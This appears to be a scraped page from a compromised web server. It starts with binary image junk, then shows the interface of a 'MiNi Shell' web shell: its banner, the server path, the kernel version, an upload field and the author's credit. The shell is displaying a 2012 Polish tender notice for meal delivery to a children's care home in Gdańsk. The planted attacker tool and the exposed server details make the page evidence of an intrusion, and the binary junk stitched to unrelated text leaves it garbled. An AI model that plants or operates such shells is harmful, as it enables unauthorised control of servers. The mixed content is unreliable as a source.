JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121126/472492-N-2012.html

<p class="kh_header"><b>Gdańsk: świadczenie usług  produkowania posiłków na bazie kuchni Oferenta zlokalizowanej poza obiektem Zamawiającego i dostarczania posiłków  do Pogotowia Opiekuńczego w Gdańsku im Karola Olgierda Borchardta.</b><br>
<b>Numer ogłoszenia: 472492 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pogotowie Opiekuńcze im. Karola Olgierda Borchardta , ul. Leczkowa 1a, 80-432 Gdańsk, woj. pomorskie, tel. 0-58 344 59 16, faks 0-58 341-10-42.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: opieka całkowita dla dzieci i młodzieży.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług  produkowania posiłków na bazie kuchni Oferenta zlokalizowanej poza obiektem Zamawiającego i dostarczania posiłków  do Pogotowia Opiekuńczego w Gdańsku im Karola Olgierda Borchardta..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług  produkowania posiłków na bazie kuchni oferenta zlokalizowanej poza obiektem zamawiającego i dostarczania posiłków do Pogotowia Opiekuńczego w Gdańsku im. Karola Olgierda Borchardta zgodnie 	z warunkami zawartymi w SIWZ, według średniego dziennego zapotrzebowania na posiłki.
2. Placówka dysponuje  30 miejscami, w tym przedmiotem zamówienia objęte są  3 Zespoły Opieki Wychowawczej ZOW. Liczba osób żywionych nie jest stała. Z uwagi na charakter działalności Pogotowia Opiekuńczego (charakter interwencyjny,nieferyjny z dużą rotacją wychowanków)zapotrzebowanie może ulegać zmianom.
3. Na przedmiot zamówienia składa się:produkowanie posiłków, dowóz wyprodukowanych posiłków do siedziby zamawiającego,dystrybucja posiłków do aneksów kuchennych 3 Zespołów Opieki Wychowawczej zlokalizowanych na dwóch kondygnacjach budynku będącego siedzibą zamawiającego, odbiór i utylizacja odpadów pokonsumpcyjnych, wykonawca pobiera i przechowuje próbki wszystkich produktów i potraw wyprodukowanych przez kuchnię dla Zamawiającego zgodnie z rozporządzeniem Ministra Zdrowia z dnia  17.04. 2007 r. w sprawie pobierania i przechowywania próbek.  
4. Zapotrzebowanie na okres od 01.01.2013r. do 31.12.2013r przez wszystkie dni tygodnia  wynosi:
śniadanie i II śniadanie  ok. 6000 porcji
obiad* i podwieczorek    ok. 6000 porcji
kolacja.                        ok. 6000 porcji		
 * porcja obiadowa winna składać się z dwóch dań.
5.W Pogotowiu Opiekuńczym występuje dieta ogólna, dostosowana do dzieci  i młodzieży  w wieku od 6 do 18 lat.
6. Zamawiający w sytuacjach wyjątkowych, zastrzega sobie prawo do zamówienia diety innej niż ogólna.
7. Przygotowanie posiłków:
Wykonawca produkuje posiłki w oparciu o kuchnię własną zlokalizowaną poza siedzibą  zamawiającego. Posiłki zostaną przygotowane i dostarczone zamawiającemu wyłącznym staraniem i na wyłączny koszt wykonawcy zamówienia. Posiłki powinny zostać przygotowane i dostarczone w gotowej postaci zgodnie z zasadami prawidłowego żywienia, zasad systemu HACCP.Wykonawca posiada zezwolenie na produkcję i przewóz posiłków wydane przez odpowiednie organy kontrolne oraz wdrożoną lub rozpoczętą procedurę wdrażania systemu HACCP, uwzględniającą dystrybucję posiłków do aneksów kuchennych oraz odbiór odpadów pokonsumpcyjnych z aneksów kuchennych zamawiającego. 	Wsad do kotła 1 osobodnia nie może być niższy niż  9,50 zł. brutto  po cenach zakupu w miesięcznym okresie rozliczeniowym.Podstawą sporządzenia posiłków będzie jadłospis dekadowy sporządzony przez  wykonawcę i zatwierdzony przez zamawiającego. Opracowany jadłospis na 5 dni przed wprowadzeniem do realizacji, wykonawca musi przedłożyć zamawiającemu celem zatwierdzenia. O ewentualnych zmianach w jadłospisie należy niezwłocznie powiadomić zamawiającego. Jadłospis powinien określać rodzaj posiłku, gramaturę, wartość energetyczną oraz koszt wsadu do kotła w rozbiciu na poszczególne składniki posiłków. Posiłki powinny pokrywać odpowiednie zapotrzebowanie na kalorie i podstawowe składniki odżywcze tj. węglowodany, białka, tłuszcze, witaminy oraz sole mineralne. Zestawy produktów zawarte w jadłospisach muszą zawierać zróżnicowane menu z   uwzględnieniem sezonowych produktów dostępnych na rynku. W ramach jadłospisu dekadowego zasadnicze produkty potraw składające się na poszczególne posiłki nie mogą się powtarzać częściej niż co 5 dn. Produkcja, dowóz, dystrybucja posiłków do aneksów kuchennych oraz utylizacja odpadów musi odbywać się w sposób zapewniający wymagany standard sanitarno-epidemiologiczny oraz  zgodny z wszystkimi obowiązującym na terenie Polski aktami wykonawczymi w  zakresie  produkcji  i organizacji żywienia zbiorowego ,wymóg dotyczy  całego okresu  trwania umowy. Zakupy surowców oferent będzie realizował we własnym zakresie zapewniając ich  wysoką jakość. Dostarczane posiłki muszą być świeże, przygotowane przez wykonawcę wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych z bieżącej produkcji dziennej bez konieczności dodatkowej obróbki technologicznej przed dystrybucją w aneksach  kuchennych zamawiającego. Posiłki nie mogą być wykonane z produktów typu instant  , np. zupy w proszku. Oferent jest zobowiązany do urozmaicenia posiłków z uwzględnieniem tradycji Świąt Bożego Narodzenia oraz Wielkanocy. Temperatura dostarczonych  posiłków powinna wynosić od  65 - 80° C. Oferent będzie ponosił pełną odpowiedzialność za jakość dostarczanych posiłków, tj odpowiednią gramaturę, wartość  energetyczną  i odżywczą,  właściwe walory smakowe i estetyczne, czystość mikrobiologiczną, dobór właściwych surowców oraz właściwych procesów technologicznych. Organizacja wydawania i konsumpcji dostarczanych do aneksów kuchennych posiłków należy do zamawiającego. 
8. Sposób realizacji usługi:
posiłki powinny zostać przygotowane i dostarczone tak, aby możliwe było ich wydanie przez zamawiającego w następujących godzinach: 
Śniadanie i II śniadanie    godz. 6.00
Obiad i Podwieczorek         godz. 13.00
Kolacja	                        godz. 17.30
Posiłki muszą być pakowane  oddzielnie dla każdego Zespołu Opieki Wychowawczej
ZOW I     do 10 podopiecznych,
ZOW II    do 10 podopiecznych,
ZOW III   do10 podopiecznych,
Posiłki  produkowane w kuchni Oferenta muszą być dowożone do placówki
zamawiającego samochodami  przystosowanymi  do  transportu  żywności  
w  specjalnych   termoportach  o następujących  parametrach:
a)nie wymagają wstępnego nagrzania,
b) spadek temperatury posiłku  nie jest większy niż 2 stopnie na godzinę,
c)w pokrywie umieszczony jest odpowietrznik wyrównujący ciśnienie wewnętrzne termosu,
d)uchwyty wygodne przy transporcie, nie mocowane dodatkowo,
e)obudowa trwała, odporna na uszkodzenia mechaniczne i zewnętrzne warunki atmosferyczne,
f) posiadają odpowiedni atest,
4)termoporty wraz z wyposażeniem do przewozu posiłków zapewnia wykonawca,
5)dostawy będą realizowane na podstawie codziennych zamówień dokonywanych z jednodniowym wyprzedzeniem przez zamawiającego drogą faksową, określających każdorazowo ilość posiłków, z możliwością  do prowiantowania do godziny 9.00 następnego dnia po złożeniu zamówienia,
6)dostawa posiłków odbywać się będzie do  placówki zamawiającego z dystrybucją do aneksów  kuchennych 3 Zespołów Opieki Wychowawczej zlokalizowanych na  dwóch kondygnacjach:
a)I piętro   2 Zespoły Opieki Wychowawczej  ZOW I, ZOW II,
b)II piętro  1 Zespół Opieki Wychowawczej  ZOW III,
7) mycie oraz dezynfekcja  termoportów należeć będzie do wykonawcy,
8)odbiór i utylizacja odpadów pokonsumpcyjnych leży po stronie wykonawcy.
9)oferent będzie zobowiązany do prowadzenia ewidencji wydawanych posiłków oraz do każdorazowego  imiennego potwierdzania odbioru posiłków przez osoby odbierające posiłki,
10)zamawiający zastrzega sobie prawo do oceny i weryfikacji wszystkich parametrów wykonania zleconej usługi na każdym etapie oraz w każdej chwili i produkcji dystrybucji posiłków..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym                do wykazania spełniania warunków wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert 
albo wniosków o dopuszczenie do udziału w postępowaniu, 
a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie z podaniem ich wartości przedmiotu, dat wykonania, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie warunków nastąpi poprzez złożenie dokumentu Stacji Sanitarno-Epidemiologicznej potwierdzającego dopuszczenie żywienia zbiorowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą wykonywać zamówienie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie warunków nastąpi na podstawie 	złożonego oświadczenia o spełnieniu warunków określonych w art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie złożone przez Oferenta, że wdrożył lub jest w trakcie wdrażania systemu HACCP, atesty na sprzęt do transportu posiłków,  pełnomocnictwo zgodne z obowiązującymi przepisami prawa, wystawione dla osoby (osób) upoważnionych do reprezentowania oferenta w toku postępowania o udzielenie zamówienia publicznego, o ile nie wynika ono z przedstawionych dokumentów,  dokument Stacji Sanitarno-Epidemiologicznej potwierdzający dopuszczenie żywienia zbiorowego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - załącznik nr 1 do SIWZ.
2. Formularz cenowy - załącznik nr 1 do oferty.
3. Wykaz wykonanych usług -załącznik nr 2 do oferty.
4. Wykaz osób- załącznik nr 3 do oferty.
5. Wzór umowy z formularzem cenowym  - załącznik nr 4 do oferty.
6. Oświadczenia o spełnianiu warunków udziału w postępowaniu- załącznik nr 2 do SIWZ.
7. Oświadczenie o braku podstaw do wykluczenia - załącznik nr 3 do SIWZ.
8. Oświadczenie  dotyczące zapoznania się z treścią SIWZ - załącznik nr 4 do SIWZ.
9. Wykaz podwykonawców  - załącznik nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie:
a) zmiany wynagrodzenia wykonawcy za wykonanie zamówienia, w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów i usług VAT, 
b)zmiany stawki podatkowej VAT nie wymaga wprowadzenia odrębnym aneksem do umowy jednak winna być udokumentowana na piśmie,
c) zmiany terminu wykonania zamówienia w przypadku wystąpienia: - siły wyższej. Siła wyższa - oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy występujące  po podpisaniu umowy,a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzemieniu, - innych uzasadnionych przyczyn pod warunkiem,że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> :http://www.pogotowieopiekuncze.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pogotowie Opiekuńcze  w Gdańsku im Karola Olgierda Borchardta
ul. Konrada Leczkowa 1 A , 80- 432  Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 11:00, miejsce: Sekretariat Pogotowia Opiekuńczego  w Gdańsku im Karola Olgierda Borchardta
ul. Konrada Leczkowa 1 A , 80- 432  Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com